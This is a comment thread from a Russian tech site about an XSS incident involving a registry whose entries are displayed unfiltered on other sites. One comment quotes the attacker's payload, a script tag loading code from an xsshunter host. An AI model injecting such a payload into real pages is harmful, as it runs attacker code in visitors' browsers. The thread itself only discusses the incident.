Как стать автором
Обновить

Комментарии 4

Казалось бы причем тут какой-то реестр и сайты, которые не фильтруют контент который отображают.
Давайте теперь засунем правила по которым в реестре нельзя писать другие символы, а что — где-то это тоже может вызвать XSS-атаку, в каком нибудь Gopher.
Британский юмор он сложный ;) Суть шутки в том, что реестр с уязвимостями государственный, и исправлять уязвимости не очень торопятся. Но это не точно.

Реестр нормально работает, у него как раз нет пробоем

При эксплуатации атаки он использовал сервис xsshunter, судя по его пейлоду:
"><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT>
Зарегистрируйтесь на Хабре , чтобы оставить комментарий

Другие новости

Истории